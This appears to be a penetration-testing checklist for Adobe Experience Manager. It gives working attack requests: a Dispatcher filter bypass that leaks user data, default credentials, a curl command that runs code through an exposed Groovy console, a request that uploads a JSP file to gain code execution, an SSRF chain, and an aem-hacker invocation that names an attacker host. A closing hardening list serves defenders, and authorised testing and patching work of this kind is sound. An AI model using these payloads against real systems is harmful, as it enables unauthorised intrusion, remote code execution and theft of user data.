AEM (Adobe Experience Manager) Pentesting

Reading time: 5 minutes

Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR).
From an attacker perspective AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that are patched every quarter.

The checklist below focuses on externally reachable (unauth) attack surface that keeps showing up in real engagements (2022-2025).

1. Fingerprinting

$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1            # header added by AEM Dispatcher
X-Vary: Accept-Encoding

Other quick indicators:

• /etc.clientlibs/ static path present (returns JS/CSS).
• /libs/granite/core/content/login.html login page with the “Adobe Experience Manager” banner.
• </script><!--/* CQ */--> comment at the bottom of HTML.

2. High-value unauthenticated endpoints

Dispatcher bypass trick

Most production sites sit behind the Dispatcher (reverse-proxy). Its filter rules can be bypassed by appending an allowed static extension after a semicolon or encoded newline:

GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1

A single request like above frequently discloses user profile nodes with email addresses. P-T Partners published good guidance on this weakness. 【】

3. Common misconfigurations (still alive in 2025)

1. Anonymous POST servlet – POST /.json with :operation=import lets you plant new JCR nodes. Blocking *.json POST in the Dispatcher fixes it. 【】
2. World-readable user profiles – default ACL grants jcr:read on /home/users/**/profile/* to everyone.
3. Default credentials – admin:admin, author:author, replication:replication.
4. WCMDebugFilter enabled ⇒ reflected XSS via ?debug=layout (CVE-2016-7882, still found on legacy 6.4 installs).
5. Groovy Console exposed – remote code execution by sending a Groovy script:

   curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
   

4. Recent vulnerabilities (service-pack cadence)

Always check the APSB bulletin matching the customer’s service-pack and request the latest 6.5.22 or Cloud Service 2024.11.

5. Exploitation snippets

5.1 RCE via dispatcher bypass + JSP upload

If anonymous write is possible:

# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded

:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import

Now request /content/evil.jsp – the JSP runs with the AEM process user.

5.2 SSRF to RCE (historical < 6.3)

/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console
aem_ssrf2rce.py from aem-hacker automates the full chain. 【】

6. Tooling

• aem-hacker – Swiss-army enumeration script, supports dispatcher bypass, SSRF detection, default-creds checks and more.

  python3 aem_hacker.py -u https://target --host attacker-ip
  ```【】
  

• Content Brute-force – recursively request /_jcr_content.(json|html) to discover hidden components.
• osgi-infect – upload malicious OSGi bundle via /system/console/bundles if creds available.

7. Hardening checklist (for your report’s recommendations)

1. Keep instance on the latest cumulative service pack (as of Jul 2025: 6.5.22).
2. Remove/rotate default accounts; enforce SSO/SAML.
3. Tighten Dispatcher filters – deny ;, encoded newlines, and *.json or *.querybuilder.json for anonymous users.
4. Disable or protect consoles (/system/console, /crx/*, /etc/groovyconsole) with IP allow-lists.
5. Apply the Anonymous Permission Hardening package shipped by Adobe.

References

• Adobe Security Bulletin APSB24-69 – “Security updates for Adobe Experience Manager (Dec 2024)”.
• 0ang3el – aem-hacker tool (GitHub).